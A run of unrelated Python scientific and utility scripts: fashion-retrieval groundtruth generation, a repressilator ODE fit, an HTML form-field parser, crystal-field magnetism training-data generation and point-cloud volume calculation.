'__main__': unittest.main()
from datasets import fashion200k from datasets import fashion_iq from datasets import shoes from config import * from model import * import tensorflow as tf import numpy as np # python generate_groundtruth.py --dataset='fashion200k' # python generate_groundtruth.py --dataset='shoes' --data_path='' # python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' # python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' --subset=dress # python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' --subset=shirt # python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' --subset=toptee tf.app.flags.DEFINE_string( 'data_path', "datasets/fashion200k", 'path of dataset.') tf.app.flags.DEFINE_string( 'data_split', "test", '') tf.app.flags.DEFINE_string( 'dataset', "fashion200k", '') tf.app.flags.DEFINE_string( 'subset', None, 'can be "dress" or "shirt" or "toptee".') def main(): ### prepare test set if FLAGS.dataset == "fashion200k": testset = fashion200k.fashion200k(path=FLAGS.data_path, split=FLAGS.data_split) filename = "groundtruth/fashion200k_modif_pairs.npy" elif FLAGS.dataset == "fashion_iq": testset = fashion_iq.fashion_iq(path=FLAGS.data_path, split=FLAGS.data_split, subset=FLAGS.subset) if FLAGS.subset is None: filename = "groundtruth/fashion_iq_modif_pairs.npy" else: filename = "groundtruth/fashion_iq_modif_pairs_" + FLAGS.subset + ".npy" elif FLAGS.dataset == "shoes": testset = shoes.shoes(path=FLAGS.data_path, split=FLAGS.data_split) filename = "groundtruth/shoes_modif_pairs.npy" else: raise ValueError("dataset is unknown.") ### generate source-query pairs at test time if FLAGS.dataset == "fashion200k": testset.generate_test_queries_() num_query = len(testset.test_queries) num_images = len(testset.filenames) groundtruth = np.full((num_query, num_images), False, dtype=bool) ### find the matching text pairs in the testset for i in range(num_query): ### the groundtruth has the same target text :) indices = [index for (index, letter) in enumerate(testset.texts) if letter == testset.test_queries[i]['target_caption']] groundtruth[i, indices] = True #1 np.save(filename, groundtruth) elif FLAGS.dataset == 'shoes': testset.generate_queries_() testset.generate_test_images_all_() database = testset.database num_images = len(database) num_query = len(testset.source_files) groundtruth = np.full((num_query, num_images), False, dtype=bool) for i in range(num_query): idx = database.index(testset.target_files[i]) groundtruth[i, idx] = True print('num_images = %d; num_query = %d' % (num_images, num_query)) np.save(filename, groundtruth) elif FLAGS.dataset == 'fashion_iq': testset.generate_queries_(subset=FLAGS.subset) testset.generate_test_images_all_(subset=FLAGS.subset) database = testset.database num_images = len(database) num_query = len(testset.source_files) groundtruth = np.full((num_query, num_images), False, dtype=bool) for i in range(num_query): idx = database.index(testset.target_files[i]) groundtruth[i, idx] = True print('num_images = %d; num_query = %d' % (num_images, num_query)) np.save(filename, groundtruth) if __name__ == '__main__': main()
#!/usr/bin/env python import numpy as np from scipy.integrate import odeint repressilator_bounds = [(0.0001, 3), (0, 3), (0.0001, 300), (1, 3)] def repressilator(k): time = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0, 20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0, 27.0, 28.0, 29.0, 30.0] data = [[0.0, 4.488846434366473, 2.714549849482517, 6.444232842805658, 24.46915418051586, 28.10847096509343, 12.352648374738962, 4.642084698577026, 1.7680776143463963, 1.021496030595813, 3.267806870812699, 20.929580826244084, 78.3339386191075, 100.7436161294691, 47.79012929059134, 17.941099072860265, 6.617110586145705, 2.4440268086718504, 0.951563472874828, 0.7644717392379156, 3.5650512822218166, 23.478296974713917, 87.23136259723577, 128.32521206660542, 69.30940166807454, 26.37789572418784, 9.734102510989835, 3.5877278085642805, 1.341496339018698, 0.6566841899282982, 1.5514740612906064], [0.0, 7.742061201862163, 14.391088537157326, 16.974296844695527, 7.899954410672454, 3.069399974996809, 1.4354765740337925, 2.6773119148949496, 15.941754369100247, 63.10289659169389, 75.72477982893746, 34.0520319646856, 12.7289107612553, 4.696629202852429, 1.7465995092492885, 0.7699829065751013, 1.3012974418730994, 8.258355474482642, 45.87172051258875, 115.03319324718298, 103.88397198459698, 43.774965755726306, 16.26789221889942, 5.995229700373173, 2.2150455948615915, 0.872025466380766, 0.7757453858288323, 3.883609594481504, 25.34784699509665, 90.8747629049713, 129.33441542341896], [0.0, 15.377957596058963, 7.271258542143068, 3.130204124770662, 1.9680627901714662, 5.88349037388796, 29.67982713087371, 54.460354064814375, 28.46895977886859, 10.807796228922934, 3.9986584694811, 1.507968306741181, 0.8159479616352445, 2.373231728111996, 15.757634891245326, 69.26229678427654, 120.1993554217916, 71.53867088006662, 27.56348971165622, 10.18036554609494, 3.7524367255334536, 1.4013420739082287, 0.6712101030917313, 1.496285727399844, 9.97675873270304, 52.53481181917566, 121.78229638959401, 103.36679024093779, 42.84595626728656, 15.902563870945832, 5.860016651007407], [5.0, 3.7838452971716685, 2.7474664897608516, 8.301575599628254, 28.947584598674258, 25.013238712836074, 9.9924721357968, 3.726366255890754, 1.446840734155867, 1.054385536657148, 4.457314954597095, 28.137201041233915, 91.43846811458191, 93.2188752686717, 38.7803561106884, 14.370017414630524, 5.296162462028342, 1.9600077860482445, 0.7946386996400134, 0.8795461071715619, 4.944394318921207, 31.499164170332946, 102.28991056938025, 124.50395812364114, 56.795321112621046, 21.13964698165305, 7.790239451169012, 2.8726041530697364, 1.0865219442970149, 0.6307944930344132, 2.0848918689606855], [0.0, 7.862347076990986, 16.621041722916388, 15.393063602753598, 6.443103590060988, 2.495836230065179, 1.330784634849836, 3.507181780947691, 21.549868725965723, 73.98225839463343, 68.39234852399709, 27.540315326699634, 10.1942538423991, 3.76029412985095, 1.4080468655473872, 0.6979691371526444, 1.6975358084630652, 11.440580249938984, 58.55466038674178, 125.37615593859023, 90.63257642471467, 35.26543063698353, 13.0232526301014, 4.798156416258913, 1.777066339706983, 0.7341923658523394, 0.9148179382167453, 5.395779231869185, 33.87282378972335, 105.89835094407697, 124.64292696753931], [15.0, 13.19508896774686, 6.089957927605723, 2.623252877978745, 2.043504673077439, 7.871507322911047, 37.40757267760475, 52.64984146642906, 23.2622883707938, 8.664377770258772, 3.204126405040172, 1.2281613471574242, 0.8209470359420186, 3.2274735892153115, 21.484132877498908, 83.8154464725227, 120.34043619689287, 59.11277660705078, 22.10306981303201, 8.147819943670633, 3.0043938453519865, 1.133834734169324, 0.6375264866255466, 2.001979323134851, 13.786923392575122, 66.1986210559441, 131.06571578133176, 89.35344838736052, 34.48545842054846, 12.729978045976193, 4.689921055534799]] def repressilator_model(y, t): dy0 = 5 * y[3] - 5 * y[0] dy1 = 5 * y[4] - 5 * y[1] dy2 = 5 * y[5] - 5 * y[2] dy3 = k[1] + k[2] / (1 + y[2] ** k[3]) - k[0] * y[3] dy4 = k[1] + k[2] / (1 + y[0] ** k[3]) - k[0] * y[4] dy5 = k[1] + k[2] / (1 + y[1] ** k[3]) - k[0] * y[5] return [dy0, dy1, dy2, dy3, dy4, dy5] init = np.array([0.0, 0.0, 0.0, 5.0, 0.0, 15.0]) simulation = odeint(repressilator_model, init, time) return sum([sum((simulation[:, i] - data[i]) ** 2) for i in range(len(data))])
"""Extract form handler""" import logging class FilesUploadForm: def __init__(self, form_root): """Takes in the root form node returned by lxml.etree.fromstring()""" self.root = form_root self.named_fields = [tag for tag in self.root.xpath('.//*[@name]')] self.prefilled_fields = [(field.attrib['name'], field.attrib.get('value')) for field in self.named_fields] self.log = logging.getLogger(__name__) log_fmt = f'%(levelname)s: %(asctime)s {self.__class__.__name__}.%(funcName)s: %(message)s' stream_hdlr = logging.StreamHandler() stream_hdlr.setFormatter(logging.Formatter(fmt=log_fmt)) self.log.addHandler(stream_hdlr) def get_parsed_form_fields(self): all_parsed_options = dict() all_parsed_options.update(self.find_text_inputs()) all_parsed_options.update(self.find_selects()) return all_parsed_options def find_text_inputs(self): text_inputs = [tag for tag in self.named_fields if tag.tag == 'input' and tag.attrib.get('type') == 'text'] text_options = [(tag.attrib['name'], {'Required': False, 'ValidValues': str}) for tag in text_inputs] return dict(text_options) def find_selects(self): selects = [tag for tag in self.named_fields if tag.tag == 'select'] return self._scrape_options_to_dict(selects, False) def _scrape_options_to_dict(self, selects, allow_multiple=True): options_dict = dict() for tag in selects: options = [(option.text, option.attrib.get('value')) for option in tag.xpath('.//option')] options_dict[tag.attrib['name']] = {'Required': True, 'ValidValues': dict([('_allows_multiple', allow_multiple)] + options)} return options_dict
from ast import parse import numpy as np import pandas as pd from scipy import linalg as LA from numpy.random import default_rng import ham_cr import os import argparse class training_data: """ Class generates and output training data: specific_heat(T), susceptibility(T) and magnetization(T, B) along specified direction(s). (Optional) parameters that can be provided at instantiation: point_group: Point group defined form of crystal field Hamiltonian (set to 'Oh' per default) N_t: Number of training sets = number of randomly chosen Stevens parameter sets. (Set to 1 per default) rng_seed: seed of random number generator that draws Stevens parameters (set to 1 per default) J, L, S: angular momentum of ion (set to J=4, L=5, S=1 per default) B_directions: magnetic field directions that are considered in susc and mag (set to [[0,0,1]] per default) Functions: """ # Bohr magneton over Boltzmann constant # Used to transform magnetic field B from unitsof Tesla to units of Kelvin: [muB*B/k_B] = Kelvin with [B] = Tesla muB_over_kB = 0.671713816 def __init__(self, point_group = 'Oh', N_t = 1, rng_seed = 1, J = 4, L = 5, S = 1, B_directions = [[0,0,1]]): self.point_group = point_group self.N_t = N_t self.rng_seed = rng_seed self.rg = default_rng(rng_seed) self.J = J self.L = L self.S = S self.B_directions = B_directions ###### define angular momentum operators Jx_op, Jy_op, Jz_op for a given J value ##### def Jz_op(self): mat = np.diag(np.arange(2*self.J+1,dtype=np.float) - self.J) return mat def Jplus_op(self): mat = np.diag(np.sqrt((2*self.J - np.arange(2*self.J))*(np.arange(2*self.J)+1)), -1) return mat def Jminus_op(self): mat = np.diag(np.sqrt((2*self.J - np.arange(2*self.J))*(np.arange(2*self.J)+1)), 1) return mat def Jx_op(self): mat = (self.Jplus_op() + self.Jminus_op())/2. return mat def Jy_op(self): mat = -1j/2.*(self.Jplus_op() - self.Jminus_op()) return mat def gJLS(self): return 1 + (self.J*(self.J + 1) + self.S*(self.S+1) - self.L*(self.L+1))/(2*self.J*(self.J + 1)) ####### Draw random Stevens paramaters ####################################### def generate_random_stevens(self, W_sign): """ Generated random values for Stevens parameters for given point group. Parameters: point_group: string of point group in Schoenflies notation Returns: stevens_params: array with random instances of Stevens parameters """ # TO DO: implement error messages if range is not correct: in particular, it will get stuck if the range of the x_1, ..., x_{N-1} is not given by [-1,1] if self.point_group == 'Oh': # two Stevens parameters for m-3m = Oh point group range = [[0.5, 50],[-1,1]] x0 = (range[0][0] + (range[0][1] - range[0][0])*self.rg.random())*W_sign x1 = range[1][0] + (range[1][1] - range[1][0])*self.rg.random() stevens_params = np.array([x0, x1]) elif self.point_group == "C4v": # 5 Stevens parameters for 4mm = C4v point group range = [[0.5, 50],[-1,1],[-1,1],[-1,1],[-1,1]] stevens_params = np.array([1.,1.,1.,1.,1., 0.]) while (np.sum(np.abs(stevens_params)) - np.abs(stevens_params[0]) - np.abs(stevens_params[-1]) > 1): stevens_params[0] = (range[0][0] + (range[0][1] - range[0][0])*self.rg.random())*W_sign stevens_params[1] = range[1][0] + (range[1][1] - range[1][0])*self.rg.random() stevens_params[2] = range[2][0] + (range[2][1] - range[2][0])*self.rg.random() stevens_params[3] = range[3][0] + (range[3][1] - range[3][0])*self.rg.random() stevens_params[4] = range[4][0] + (range[4][1] - range[4][0])*self.rg.random() stevens_params[5] = 2.*self.rg.random() - 1. # only sign of x5 matters as size is determined by x1, .., x4. elif self.point_group == "D3h": # 4 Stevens parameters for -6m2 = D3h point group range = [[0.5, 50],[-1,1],[-1,1],[-1,1]] stevens_params = np.array([1.,1.,1.,1., 0.]) while (np.sum(np.abs(stevens_params)) - np.abs(stevens_params[0]) - np.abs(stevens_params[-1]) > 1): stevens_params[0] = (range[0][0] + (range[0][1] - range[0][0])*self.rg.random())*W_sign stevens_params[1] = range[1][0] + (range[1][1] - range[1][0])*self.rg.random() stevens_params[2] = range[2][0] + (range[2][1] - range[2][0])*self.rg.random() stevens_params[3] = range[3][0] + (range[3][1] - range[3][0])*self.rg.random() stevens_params[4] = 2.*self.rg.random() - 1. # only sign of x5 matters as size is determined by x1, .., x4. else: raise ValueError("This point group is not implemented.") return stevens_params ####### Define the crystal field Hamiltonian for given point group and J ########## def ham_cr(self, stevens_params): """ Outputs crystal field Hamiltonian H in units of Kelvin. The units of H are set by the units of x0. We choose the range of x0 (=[1,50] Kelvin) that corresponds to [x0] = Kelvin. Parameters: stevens_params: array of Stevens parameters (check that length is correct). x0 has dimensions of energy (we use Kelvin) and x1, x2, ... are dimensionless in interval [-1,1]. Returns: ham_cr: crystal field Hamiltonian array """ if (self.point_group == 'Oh'): if (len(stevens_params) != 2): raise ValueError("Number of Stevens parameters should be 2 for point group Oh") if (self.J == 4): return ham_cr.ham_cr_PG_Oh_J_4(stevens_params[0], stevens_params[1]) elif (self.J == 7.5): return ham_cr.ham_cr_PG_Oh_J_7_5(stevens_params[0], stevens_params[1]) elif (self.J == 3.5): return ham_cr.ham_cr_PG_Oh_J_3_5(stevens_params[0], stevens_params[1]) elif (self.J == 6): return ham_cr.ham_cr_PG_Oh_J_6(stevens_params[0], stevens_params[1]) elif (self.J == 8): return ham_cr.ham_cr_PG_Oh_J_8(stevens_params[0], stevens_params[1]) elif (self.J == 4.5): return ham_cr.ham_cr_PG_Oh_J_4_5(stevens_params[0], stevens_params[1]) elif (self.point_group == 'C4v'): if (len(stevens_params) != 6): raise ValueError("Number of Stevens parameters should be 5+1=6 for point group C4v") if (self.J == 4): return ham_cr.ham_cr_PG_C4v_J_4(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5]) elif (self.J == 7.5): return ham_cr.ham_cr_PG_C4v_J_7_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5]) elif (self.J == 3.5): return ham_cr.ham_cr_PG_C4v_J_3_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5]) elif (self.J == 6): return ham_cr.ham_cr_PG_C4v_J_6(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5]) elif (self.J == 8): return ham_cr.ham_cr_PG_C4v_J_8(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5]) elif (self.J == 4.5): return ham_cr.ham_cr_PG_C4v_J_4_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5]) elif (self.point_group == 'D3h'): if (len(stevens_params) != 5): raise ValueError("Number of Stevens parameters should be 4+1=5 for point group D3h") if (self.J == 4): return ham_cr.ham_cr_PG_D3h_J_4(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4]) elif (self.J == 7.5): return ham_cr.ham_cr_PG_D3h_J_7_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4]) elif (self.J == 3.5): return ham_cr.ham_cr_PG_D3h_J_3_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4]) elif (self.J == 6): return ham_cr.ham_cr_PG_D3h_J_6(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4]) elif (self.J == 8): return ham_cr.ham_cr_PG_D3h_J_8(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4]) elif (self.J == 4.5): return ham_cr.ham_cr_PG_D3h_J_4_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4]) else: raise ValueError("This point group and/or value of J is not implemented.") ####### Calculate specific heat ################################## def specific_heat(self, ham, T_min=2, T_max=300, T_steps=150): """ Returns array of cV/kB for a single rare-earth ion over temperature range [T_min, T_max] for hamiltonian matrix ham. Note that [cV/kB] is dimensionless. To get the specific heat, multiply the result with the Boltzmann constant kB. Parameters: ham : hermitian Hamiltonian matrix, typically of crystal field Hamiltonian (dimension 2*J+1) T_min : minimal temperature in Kelvin T_max : maximal temprature in Kelvin T_steps: total number of steps in temperature range Returns: cV_array: cV/kB for a single rare-earth ion. Array of dimension (T_steps, 2) containing (T_i, cV/kB(T_i) ), where T_i is temperature at step i """ T = np.linspace(T_min, T_max, T_steps) # linearly spaced temperatures energies = LA.eigvalsh(ham) energies = energies - energies[0] # partition function for zero field def Z_cr(T): return np.sum(np.exp(-energies/T)) # specific heat expression def cV(T): return 1./(T**2) * (np.sum(energies**2 * np.exp(-energies/T))/Z_cr(T) - np.sum(energies * np.exp(-energies/T)/Z_cr(T))**2) cV_array = np.zeros((len(T), 2)) #this can probably be optimized using numpy ufuncs, but it is ok for now for i in range(0, len(cV_array)): cV_array[i][0] = T[i] cV_array[i][1] = cV(T[i]) return cV_array ######### Calculate magnetization ############################## def magnetization(self, ham_cr, B_direction, B_min=0, B_max=10, B_steps=20, T_min=2, T_max=300, T_steps=4): """ Returns array of moment per R-ion mu/mu_B (over mu_B) over temperature and magnetic field range [T_min, T_max] and [B_min, B_max] for a system with zero-field Hamiltonian matrix ham_cr. Note mu/mu_B is dimensionless. The magnetic field is along B_direction (x, y, z). Parameters: ham_cr : hermitian Hamiltonian matrix in zero field, typically of crystal field Hamiltonian (dimension 2*J+1) B_direction: (B_x, B_y, B_z) triple denoting the field direction in real space B_min: minimal field (in Tesla) B_max: maximal field (in Tesla) B_steps: total number of steps in field range T_min : minimal temperature in Kelvin T_max : maximal temprature in Kelvin T_steps: total number of steps in temperature range Returns: mag_array: induced moment on R-ion mu/muB in array of dimension (T_steps, B_steps, 2) containing (B_i, T_i, mag(B_i, T_i) ), where T_i (B_i) is temperature (field) at step i. Note that this differs by a factor of gJLS from a previous version of the function. """ gJLS = float(self.gJLS()) T_array = np.geomspace(T_min, T_max, T_steps) B_array = np.linspace(B_min, B_max, B_steps) B_direction = B_direction/LA.norm(B_direction) J_op = B_direction[0]*self.Jx_op() + B_direction[1]*self.Jy_op() + B_direction[2]*self.Jz_op() mag_array = np.zeros((len(B_array), len(T_array), 3)) # this can probably be optimized using numpy ufuncs, but it is ok for now for B_idx in np.arange(0, len(B_array)): B = B_array[B_idx] ham = ham_cr - gJLS*self.muB_over_kB*J_op*B energies, eigenstates = LA.eigh(ham) energies = energies - energies[0] for T_idx in range(0, len(T_array)): T = T_array[T_idx] ZB = np.sum(np.exp(-energies/T)) # mag = \mu/\mu_B is moment per R-ion over Bohr magneton. mag is dimensionless. mag = gJLS/ZB*np.sum([np.dot(np.conjugate(eigenstates[:,i]), np.dot(J_op, eigenstates)[:, i])*np.exp(-energies[i]/T) for i in range(0, len(energies))]) mag_array[B_idx][T_idx][0] = B_array[B_idx] mag_array[B_idx][T_idx][1] = T_array[T_idx] mag_array[B_idx][T_idx][2] = mag return mag_array ########### Calculate magnetic susceptibility ############################ def susceptibility(self, ham_cr, B_direction, B=0.0001, T_min=1, T_max=300, T_steps=300): """ Calculated and returns magnetic susceptibility chi_a = mu/(mu_B*B) (units of 1/T) over temperature range [T_min, T_max] for zero-field Hamiltonian matrix ham_cr. Here, mu is the induced moment on the R-ion, mu_B is the Bohr magneton and B the magnetic field. The direction is a=B_direction . Parameters: ham_cr : hermitian Hamiltonian matrix in zero field, typically a crystal field Hamiltonian (dimension 2*J+1) B_direction: (B_x, B_y, B_z) triple denoting the field direction in real space B: B field used in susceptibility calculation (in Tesla). Should be << all other energy scales. T_min : minimal temperature in Kelvin T_max : maximal temprature in Kelvin T_steps: total number of steps in temperature range Returns: susc_array: array of dimension (T_steps, 2) containing (T_i, mu(T_i)/(muB*B), where T_i is temperature at step i and mu(T_i)/mu_B = mag(T_i) is the field induced moment on the R-ion. Note that this differs by a factor of gJLS from a previous version of the function. """ gJLS = float(self.gJLS()) T_array = np.linspace(T_min, T_max, T_steps) B_direction = B_direction/LA.norm(B_direction) J_op = B_direction[0]*self.Jx_op() + B_direction[1]*self.Jy_op() + B_direction[2]*self.Jz_op() susc_array = np.zeros((len(T_array), 2)) # this can probably be optimized using numpy ufuncs, but it is ok for now # B is given in units of T, ham is in units of K. ham = ham_cr - gJLS*self.muB_over_kB*J_op*B energies, eigenstates = LA.eigh(ham) energies = energies - energies[0] for T_idx in range(0, len(T_array)): T = T_array[T_idx] ZB = np.sum(np.exp(-energies/T)) # mag = mu/mu_B, where \mu is the field induced moment on the R-ion mag = gJLS/ZB*np.sum([np.dot(np.conjugate(eigenstates[:,i]), np.dot(J_op, eigenstates)[:, i])*np.exp(-energies[i]/T) for i in range(0, len(energies))]) susc_array[T_idx][0] = T_array[T_idx] # susc = mag/B = \mu/(\mu_B B) has units of 1/T susc_array[T_idx][1] = mag/B return susc_array ######## Output training data into files ################# def output_all_data(self, W_sign, cV_T_range = [1, 300, 100], susc_T_range = [1, 300, 100], mag_T_range = [1, 300, 4], mag_B_range = [0.5, 10, 20]): """ Write training data to file Parameters: W_sign: sign of W for Stevens parameters Optional parameters: cV_T_range: [T_min, T_max, T_steps] array for specific heat calculation susc_T_range: [T_min, T_max, T_steps] array for susceptibility calculation mag_T_range: [T_min, T_max, T_steps] array for magnetization calculation mag_B_range: [B_min, B_max, B_steps], where B_steps is the number of B points within range [B_min, B_max] Returns: stevens_params_all: array with parameter values of Stevens parameters cV_data_all: array with specific heat values susc_data_all: array with susceptibility values mag_data_all: array with magnetization values """ stevens_params_all = [] cV_data_all = [] susc_data_all = [] mag_data_all = [] for N_t_idx in range(0, self.N_t): stevens_params = self.generate_random_stevens(W_sign) # draw random Stevens parameters stevens_params_all.append(stevens_params) # use a list to store all Stevens parameters. Since different point groups have different number of Stevens parameters, the tuples that are stored have different length. ham_cr = self.ham_cr(stevens_params) # crystal field Hamiltonian for given random Stevens parameters # generate specific heat data and store in cV_data cV_data_all.append(self.specific_heat(ham_cr, T_min = cV_T_range[0], T_max = cV_T_range[1], T_steps = cV_T_range[2])) B_direction_steps = len(self.B_directions) # generate susceptibility data and store in susc_data (for all B_directions) susc_data = np.zeros((susc_T_range[2], 1 + B_direction_steps)) mag_data = np.zeros((mag_B_range[2], mag_T_range[2], 2 + B_direction_steps)) for B_direction_idx in range (0, B_direction_steps): B_direction = self.B_directions[B_direction_idx] susc_array = self.susceptibility(ham_cr, B_direction, B = 0.0001, T_min = susc_T_range[0], T_max = susc_T_range[1], T_steps = susc_T_range[2]) mag_array = self.magnetization(ham_cr, B_direction, B_min = mag_B_range[0], B_max = mag_B_range[1], B_steps = mag_B_range[2], T_min = mag_T_range[0], T_max = mag_T_range[1], T_steps = mag_T_range[2]) for T_idx in range (0, len(susc_array)): if (B_direction_idx == 0): susc_data[T_idx][0] = susc_array[T_idx][0] susc_data[T_idx][1 + B_direction_idx] = susc_array[T_idx][1] for B_idx in range (0, mag_B_range[2]): for T_idx in range(0, mag_T_range[2]): if (B_direction_idx == 0): mag_data[B_idx][T_idx][0] = mag_array[B_idx][T_idx][0] mag_data[B_idx][T_idx][1] = mag_array[B_idx][T_idx][1] mag_data[B_idx][T_idx][2 + B_direction_idx] = mag_array[B_idx][T_idx][2] susc_data_all.append(susc_data) mag_data_all.append(mag_data) return stevens_params_all, cV_data_all, susc_data_all, mag_data_all if __name__=='__main__': parser = argparse.ArgumentParser() # Command line arguments parser.add_argument("-pg", "--pg", type=str, default="Oh", help="Crystal field point group") parser.add_argument("-J", "--J", type=int, default=4, help="Total angular momentum") parser.add_argument("-L", "--L", type=int, default=5, help="Orbital angular momentum") parser.add_argument("-S", "--S", type=int, default=1, help="Spin angular momentum") parser.add_argument("-b", "--b_dirs", type=list, default=[[1,0,0],[0,0,1]], help="Magnetic field directions") parser.add_argument("-n", "--num_ex", type=int, default=1000, help="Number of training examples to generate") parser.add_argument("-o", "--output_dir", type=str, default=os.getcwd(), help="Output directory") parser.add_argument("-sd", "--seed", type=int, default=None, help="Seed for random number generator") parser.add_argument("-w", "--w_sign", type=int, default=1, help="Sign of x_0") parser.add_argument("-cV", "--cV_T_range", type=list, default=[1, 300, 64], help="[T_min, T_max, T_steps] array for specific heat calculation") parser.add_argument("-su", "--susc_T_range", type=list, default=[1, 300, 64], help="[T_min, T_max, T_steps] array for susceptibility calculation") parser.add_argument("-mT", "--mag_T_range", type=list, default=[1, 300, 3], help="[T_min, T_max, T_steps] array for magnetization calculation") parser.add_argument("-mB", "--mag_B_range", type=list, default=[0, 10, 64], help="[B_min, B_max, B_steps], where B_steps is the number of B points within range [B_min, B_max]") args = parser.parse_args() POINT_GROUP = args.pg B_DIRECTIONS = args.b_dirs W_SIGN = args.w_sign SEED = args.seed TRAINING_EXAMPLES = args.num_ex J = args.J #4 #15/2 L = args.L #5 #6 S = args.S #1 #3/2 OUTPUT_DIR = args.output_dir CV_T_RANGE = args.cV_T_range SUSC_T_RANGE = args.susc_T_range MAG_T_RANGE = args.mag_T_range MAG_B_RANGE = args.mag_B_range td = training_data(POINT_GROUP, TRAINING_EXAMPLES, SEED, J, L, S, B_DIRECTIONS) out = td.output_all_data( W_sign = W_SIGN, cV_T_range = CV_T_RANGE, susc_T_range = SUSC_T_RANGE, mag_T_range = MAG_T_RANGE, mag_B_range = MAG_B_RANGE ) #out[0] # Stevens parameters #out[1] # specific heat [[T_i, cV^(0)_i], [T_i, cV^(1)_i], ..., [T_i, cV^(N_t-1)_i] ], i = 1, ..., T_steps #out[2] # susceptibility [[T_i, susc^(0)_{0,i}, susc^{(0)_{1,i}, ..., susc^(0)_{B_direction-1,i}}], ...], i = 1, ..., T_steps #out[3] # magnetization [[[B_j, T_i, M^(0),{0,i}, M^(0)_{1,i,j}, ..., M^(0)_{B_direction-1,i,j}], ... ]], j = 1, .., B_steps; i = 1, ..., T_steps targets_df = pd.DataFrame(out[0]) data_arr = np.array(out[1])[:,:,1] for i in range(len(B_DIRECTIONS)): # size of B_directions data_arr = np.concatenate([data_arr, np.array(out[2])[:,:,i+1]], axis=1) for i in range(MAG_T_RANGE[2]): # T step for magnetization for j in range(len(B_DIRECTIONS)): # size of B_directions data_arr = np.concatenate([data_arr, np.array(out[3])[:,:,i,j+2]], axis=1) data_df = pd.DataFrame(data_arr) targets_df.to_csv(os.path.join(OUTPUT_DIR, "generated_targets.csv"), header=None, index=None) data_df.to_csv(os.path.join(OUTPUT_DIR, "generated_data.csv"), header=None, index=None)
#!/home/amit/Software/miniconda3/envs/default/bin/python import scipy.spatial as sp import csv import numpy as np import argparse import multiprocessing as mp from pointcloudvolume import calculateVolume """ # The function that calculates volume def writevolume(input): infile, outdir = input outfilename = outdir + '/volume.dat' with open(infile,'r',newline='') as inp, open(outfilename,'w') as outfile: outfile.write('volume\n') inp.readline() reader = csv.reader( inp, delimiter=',', quoting=csv.QUOTE_NONNUMERIC ) for row in reader: # Read the position and rotation vectors xr = np.array(row).reshape((-1,3)) # Get only the position vectors xi = xr[:int(xr.shape[0]/2),:] # Project the position vectors to a sphere x = xi/np.linalg.norm(xi, axis=1)[:,np.newaxis] # Make the mesh mesh = sp.ConvexHull(x).simplices # Calculate volume of each tetrahedron a = xi[mesh[:,0]] b = xi[mesh[:,1]] c = xi[mesh[:,2]] vol = 0.1666667*np.sum( np.abs( np.einsum('ij,ij->i',np.cross(a,b,axis=1),c) ) ) line = '{0:7.5f}\n'.format(vol) outfile.write(line) """ # The function that calculates volume def writevolume(input): infile, outdir = input outfilename = outdir + '/volume.dat' with open(infile,'r',newline='') as inp, open(outfilename,'w') as outfile: outfile.write('volume\n') inp.readline() reader = csv.reader( inp, delimiter=',', quoting=csv.QUOTE_NONNUMERIC ) for row in reader: vol = calculateVolume( row ) line = '{0:7.5f}\n'.format(vol) outfile.write(line) if __name__ == "__main__": # Create a command-line argument parser parser = argparse.ArgumentParser(description='Input data file path.') parser.add_argument('-i','-input', nargs='+', required=True, help='a single or a list of input data files') parser.add_argument('-o','-output', nargs='+', required=True, help='output directories corresponding to the input files') # Parse the input files args = parser.parse_args() if( len(args.i) != len(args.o) ): print('The number of output directories do not match input files.') exit() p = mp.Pool(processes=8) p.map( writevolume, zip(args.i, args.o) )